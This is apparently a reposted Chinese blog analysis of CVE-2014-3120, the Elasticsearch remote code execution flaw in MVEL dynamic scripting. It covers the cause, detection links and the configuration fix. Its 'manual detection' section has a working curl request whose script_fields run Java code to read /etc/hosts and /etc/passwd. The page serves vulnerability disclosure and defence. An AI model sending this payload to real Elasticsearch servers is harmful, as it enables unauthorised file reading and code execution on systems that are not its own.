2. 程式人生 > >ElasticSearch遠端任意程式碼執行漏洞(CVE-2014-3120)分析

ElasticSearch遠端任意程式碼執行漏洞(CVE-2014-3120)分析

阿新 發佈:2018-12-23

原理

這個漏洞實際上非常簡單,ElasticSearch有指令碼執行(scripting)的功能,可以很方便地對查詢出來的資料再加工處理。

ElasticSearch用的指令碼引擎是MVEL,這個引擎沒有做任何的防護,或者沙盒包裝,所以直接可以執行任意程式碼。

而在ElasticSearch裡,預設配置是開啟動態指令碼功能的,因此使用者可以直接通過http請求,執行任意程式碼。

其實官方是清楚這個漏洞的,在文件裡有說明:

First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween. 

檢測方法

線上檢測:

http://tool.scanv.com/es.html          可以檢測任意地址

http://bouk.co/blog/elasticsearch-rce/poc.html   只檢測localhost,不過會輸出/etc/hosts和/etc/passwd檔案的內容到網頁上

自己手動檢測:

curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "/etc/hosts": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
    },
    "/etc/passwd": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
    }
  }
}
'

處理辦法

關掉執行指令碼功能,在配置檔案elasticsearch.yml裡為每一個結點都加上:

script.disable_dynamic: true

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

官方會在1.2版本預設關閉動態指令碼。

https://github.com/elasticsearch/elasticsearch/issues/5853

參考:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

http://bouk.co/blog/elasticsearch-rce/

相關推薦

ElasticSearch遠端任意程式碼執行漏洞(CVE-2014-3120)分析

原理 這個漏洞實際上非常簡單,ElasticSearch有指令碼執行(scripting)的功能,可以很方便地對查詢出來的資料再加工處理。 ElasticSearch用的指令碼引擎是MVEL,這個引擎沒有做任何的防護,或者沙盒包裝,所以直接可以執行任意程式碼。 而在Elas

php cgi遠端任意程式碼執行漏洞

There is a vulnerability in certain CGI-based setups (Apache+mod_php and nginx+php-fpm are not affected)that has gone unnoticed for at least 8 years. Sec

thinkphp任意程式碼執行漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

任意程式碼執行漏洞

--背景介紹-- 當應用在呼叫一些字串轉化為程式碼的函式時,沒有考慮使用者是否能控制這個字串,將造成程式碼注入漏洞。 --相關函式-- PHP          eval()、assert() py

Thinkphp框架任意程式碼執行漏洞利用及修復

ThinkPHP是一個開源的PHP框架, 是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的。最早誕生於2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,並且遵循 Apache2開源協議釋出。早期的思想架構來源於Struts,後來經過不斷改進和完善,同

懸鏡安全丨Java 反序列化任意程式碼執行漏洞分析與利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

Windows VBScript引擎遠端執行程式碼漏洞 CVE-2018-8174分析與利用

漏洞簡介   VBScript引擎處理記憶體中物件的方式中存在一個遠端執行程式碼漏洞。該漏洞可能以一種攻擊者可以在當前使用者的上下文中執行任意程式碼的方式來破壞記憶體。成功利用此漏洞的攻擊者可以獲得與當前使用者相同的使用者許可權。如果當前使用者使用管理使用者許可權登入,則成功利

Flash Player型別混淆嚴重漏洞,成功利用可能導致任意程式碼執行(CVE-2018-15981)

Adobe修補了Flash Player中的一個關鍵漏洞,潛在攻擊者可利用該漏洞在當前使用者的上下文中觸發任意程式碼執行條件。 Flash Confio安全問題出現在Flash Player 31.0.0.148及更早版本中,它會影響在多個平臺上執行的版本,從Windows和macOS到Linux和Chro

CVE-2018-8174 IE瀏覽器遠端程式碼執行漏洞

0x00漏洞簡介 在2018年5月9日的時候360發表了一份apt攻擊分析及溯源報告 文中提到了cve-2018-8174這個漏洞的首次在apt方面的應用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174這個漏洞是針對

HTTP.SYS遠端程式碼執行漏洞CVE-2015-1635,MS15-034)

漏洞描述及滲透過程 HTTP協議堆疊(HTTP.sys)中存在一個遠端執行程式碼漏洞,該漏洞是在HTTP.sys不正確地分析特製HTTP請求時引起的。   漏洞危害 攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞分析及Exploit

原帖地址:http://whereisk0shl.top/cve-2017-7269-iis6-interesting-exploit.html 感謝仙果和Wingdbg,我將我部落格的這篇分析轉到看雪和大家一起分享。我的部落格會長期更新二進位制分析的文章,希望能與

Zabbix爆遠端程式碼執行漏洞、資料庫寫入高危漏洞(CVE-2017-2824)

題圖:By James Padolsey From Unsplash 關於Zabbix zabbix是一個基於WEB介面的提供分散式系統監視以及網路監視功能的企業級的開源解決方案。 zabbix能監視各種網路引數,保證伺服器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種

CVE-2018-7600 Drupal核心遠端程式碼執行漏洞分析

    0x01 漏洞介紹 Drupal是一個開源內容管理系統(CMS),全球超過100萬個網站(包括政府,電子零售,企業組織,金融機構等)使用。兩週前,Drupal安全團隊披露了一個非常關鍵的漏洞,編號CVE-2018-7600 Drupal對錶單請求內容未做嚴格過濾,因此,這使得

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現 一、漏洞描述 IIS 6.0預設不開啟WebDAV,一旦開啟了WebDAV,安裝了IIS6.0的伺服器將可能受到該漏洞的威脅。 二、影響版本以及利用條件 Windows 2003 R2開啟WebDAV服務的IIS6.0 三、漏洞環境搭建

漏洞復現】Apache Solr遠端程式碼執行CVE-2019-0193)

0x01 概述 Solr簡介 Apache Solr 是一個開源的企業級搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。Apache Solr 中儲存的資源是以 Document 為物件進行儲存的。它對外提供類似於Web-service的API介面

Apache Struts最新漏洞 遠端程式碼執行漏洞預警 2018年11月08日

2018年11月8日,SINE安全監控檢測中心,檢測到Apache Struts官方更新了一個Struts漏洞補丁,這個漏洞是Apache Struts目前最新的漏洞,影響範圍較廣,低於Apache Struts 2.3.35的版本都會受到此次Struts漏洞的***,目前apache官方更新的漏洞補丁,主要

Git中的遠端程式碼執行漏洞已被修復 多個工具受影響

  據外媒 BleepingComputer 報道,Git 專案組於前兩天公佈了一個在 Git 命令列客戶端、Git Desktop 和 Atom 中發現的任意程式碼執行漏洞,這是一個比較嚴重的安全漏洞,可能會使得惡意倉庫在易受攻擊的計算機上遠端執行命令。   這個漏洞已被分配 CVE-

GitHub修復了允許任意程式碼執行的安全漏洞 Windows不受影響

GitHub是面向全球開發人員的首選程式碼共享和託管服務。雖然歐盟尚未最終確定該交易,但該公司在6月被微軟收購,作價75億美元。今天,GitHub宣佈了他們系統中的一個漏洞,允許任意程式碼執行的安全漏洞的攻擊。現在已經解決了這個問題,目前只有Unix平臺受到了影響。 GitHub的安全列表表示,如果執行了特

墨者學院 - Tomcat 遠端程式碼執行漏洞利用(第1題)

重新整理fit網站 burp截包,repeater,更改不安全的HTTP方法為PUT(將get更改為options可檢視伺服器支援哪些) PUT /自定義檔名/ HTTP/1.1 eg:   PUT /9.jsp/ HTTP/1.1  &nb

[漏洞分析]thinkcmf 1.6.0版本從sql注入到任意程式碼執行

0x00 前言 該漏洞源於某真實案例,雖然攻擊沒有用到該漏洞,但在分析攻擊之後對該版本的cmf審計之後發現了,也算是有點機遇巧合的味道,我沒去找漏洞,漏洞找上了我XD thinkcmf 已經非常久遠了,該版本看github上的更新時間已經是4年前了,也就是2014年的時候,那時候我沒學安全呢。。。 &n